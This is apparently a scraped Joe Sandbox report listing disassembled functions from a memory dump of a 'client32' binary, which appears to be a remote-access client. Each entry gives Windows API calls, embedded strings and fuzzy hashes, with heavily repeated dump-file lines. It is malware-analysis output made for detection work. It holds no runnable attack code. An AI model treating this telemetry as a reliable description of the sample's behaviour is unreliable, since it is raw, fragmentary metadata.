Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
String ID:
API String ID: 649858571-0
Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51

Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32(?), ref: 110254CE
GetDlgItem.USER32(?,00001396), ref: 110254E2
CreateCaret.USER32(00000000,00000000,00000000,?), ref: 11025501
ShowCaret.USER32(00000000), ref: 11025515
DestroyCaret.USER32 ref: 11025529

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Caret$CreateDestroyFocusItemShow
String ID:
API String ID: 3189774202-0
Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8

Function 11043240 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

_memset.LIBCMT ref: 110433A9
GetSystemMetrics.USER32(0000004C), ref: 110433B9
GetSystemMetrics.USER32(0000004D), ref: 110433C1

Strings

Inject Touch Up @ %d,%d, id=%d, xrefs: 1104348D
Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d, xrefs: 11043456
Client, xrefs: 11043277
8zi, xrefs: 110434D3
DisableTouch, xrefs: 11043272

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MetricsSystem$__wcstoi64_memset
String ID: 8zi$Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
API String ID: 3760389471-1992849162
Opcode ID: 79330ea7170602ddc22737bc9ac19b07cb34e31a8709d3e13c96a824338789b7
Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
Opcode Fuzzy Hash: 79330ea7170602ddc22737bc9ac19b07cb34e31a8709d3e13c96a824338789b7
Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90

Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110351E0

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 11035267
_memmove.LIBCMT ref: 1103528B
_memmove.LIBCMT ref: 110352C5
_memmove.LIBCMT ref: 110352E1
std::exception::exception.LIBCMT ref: 1103532B
__CxxThrowException@8.LIBCMT ref: 11035340

Strings

deque<T> too long, xrefs: 110351DB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
Opcode Fuzzy Hash: f97e5c61995006367176a123b268b37485305f95631f07e1140d7db25037611d
Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790

Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019370

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 110193F7
_memmove.LIBCMT ref: 1101941B
_memmove.LIBCMT ref: 11019455
_memmove.LIBCMT ref: 11019471
std::exception::exception.LIBCMT ref: 110194BB
__CxxThrowException@8.LIBCMT ref: 110194D0

Strings

deque<T> too long, xrefs: 1101936B

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
Opcode Fuzzy Hash: 62f4d791a675664b0862b854b5f0477ba8b0fdce3a7690f0f6626ed673fa4650
Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790

Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

Part of subcall function 11113040: GetClientRect.USER32(?,?), ref: 1111306A

GetWindowRect.USER32(?,?), ref: 111194E1
MapWindowPoints.USER32(00000000,111239E6,?,00000002), ref: 111194FA
GetClientRect.USER32(?,?), ref: 11119508
GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
GetSystemMetrics.USER32(00000003), ref: 11119559
GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
GetSystemMetrics.USER32(00000002), ref: 11119576

Strings

GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
API String ID: 4172599486-2052393828
Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60

Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33

wsprintfA.USER32 ref: 1100977F
wsprintfA.USER32 ref: 11009799
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883

Strings

.%u, xrefs: 11009779
Store\, xrefs: 11009820
ApprovedWebList, xrefs: 11009788
%s%s.htm, xrefs: 11009793

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
String ID: %s%s.htm$.%u$ApprovedWebList$Store\
API String ID: 559337438-1872371932
Opcode ID: df60420558e54b3a01c9e1df557936c1cc331d19821b37a8bb1572a8ac7d2871
Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
Opcode Fuzzy Hash: df60420558e54b3a01c9e1df557936c1cc331d19821b37a8bb1572a8ac7d2871
Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90

Function 1106BD80 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 130COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1106BDB3
__fread_nolock.LIBCMT ref: 1106BDC8
_malloc.LIBCMT ref: 1106BE27
_fseek.LIBCMT ref: 1106BE36
__fread_nolock.LIBCMT ref: 1106BE43
_free.LIBCMT ref: 1106BE86
_fseek.LIBCMT ref: 1106BEA5

Strings

PCIR, xrefs: 1106BEC9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: __fread_nolock_fseek$_free_malloc_memset
String ID: PCIR
API String ID: 2419779768-1011558323
Opcode ID: 1f4f94fe5c8187d39855130549cadb54f7d15a02b8c8b5698fd085cdef27e12f
Instruction ID: 267cd8acc7a184fc16afe12e8ccbdca19133830390889b6753728e4778390ab7
Opcode Fuzzy Hash: 1f4f94fe5c8187d39855130549cadb54f7d15a02b8c8b5698fd085cdef27e12f
Instruction Fuzzy Hash: 65419275F01608ABEB10DFA5CC51BDEBBBEEF94708F104069E909AF344EA71A911C791

Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 11025351

Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF

SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433

Strings

8, xrefs: 110253A9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
String ID: 8
API String ID: 762489935-4194326291
Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69

Function 11015AB0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 113COMMON

Download Yara Rule

APIs

SetPropA.USER32(?,?), ref: 11015B1F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Part of subcall function 11015840: BeginPaint.USER32(?,?), ref: 1101586F
Part of subcall function 11015840: GetWindowRect.USER32(?,?), ref: 11015887
Part of subcall function 11015840: _memset.LIBCMT ref: 11015895
Part of subcall function 11015840: CreateFontIndirectA.GDI32(?), ref: 110158B1
Part of subcall function 11015840: SelectObject.GDI32(00000000,00000000), ref: 110158C5
Part of subcall function 11015840: SetBkMode.GDI32(00000000,00000001), ref: 110158D0
Part of subcall function 11015840: BeginPath.GDI32(00000000), ref: 110158DD
Part of subcall function 11015840: TextOutA.GDI32(00000000,00000000,00000000), ref: 11015900
Part of subcall function 11015840: EndPath.GDI32(00000000), ref: 11015907
Part of subcall function 11015840: PathToRegion.GDI32(00000000), ref: 1101590E
Part of subcall function 11015840: CreateSolidBrush.GDI32(?), ref: 11015920
Part of subcall function 11015840: CreateSolidBrush.GDI32(?), ref: 11015936
Part of subcall function 11015840: CreatePen.GDI32(00000000,00000002,?), ref: 11015950
Part of subcall function 11015840: SelectObject.GDI32(00000000,00000000), ref: 1101595E
Part of subcall function 11015840: SelectObject.GDI32(00000000,?), ref: 1101596E
Part of subcall function 11015840: GetRgnBox.GDI32(00000000,?), ref: 1101597B

GetPropA.USER32(?), ref: 11015B2E
wsprintfA.USER32 ref: 11015B63
RemovePropA.USER32(?), ref: 11015B98
DefWindowProcA.USER32(?,?,?,?), ref: 11015BC1

Strings

..\ctl32\NSMIdentifyWnd.cpp, xrefs: 11015AE5, 11015B03, 11015B73
NSMIdentifyWnd::m_aProp, xrefs: 11015B08
hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x, xrefs: 11015B5D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Create$ObjectPathPropSelect$BeginBrushSolidWindowwsprintf$ErrorExitFontIndirectLastMessageModePaintProcProcessRectRegionRemoveText_memset
String ID: ..\ctl32\NSMIdentifyWnd.cpp$NSMIdentifyWnd::m_aProp$hWnd=%x, uiMsg=x%x, wP=x%x, lP=x%x
API String ID: 1924375018-841114059
Opcode ID: c88aa73202e9caeaf2a83a31eb780a5491059827483371b3fec9668b5f5e1b36
Instruction ID: 4e8cf1b6dc488997812c0e3e0eb530f194290cc4a1258c30516277c8b489bfcb
Opcode Fuzzy Hash: c88aa73202e9caeaf2a83a31eb780a5491059827483371b3fec9668b5f5e1b36
Instruction Fuzzy Hash: F3318275E01129ABDB14DF94CCC5FBEB368FF4A318F0440AAF916AF148DA3999508F61

Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1100521E
_memset.LIBCMT ref: 11005240
GetMenuItemID.USER32(?,00000000), ref: 11005254
CheckMenuItem.USER32(?,00000000,00000000), ref: 110052B1
EnableMenuItem.USER32(?,00000000,00000000), ref: 110052C7
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 110052E8
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005314

Strings

0, xrefs: 1100524D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
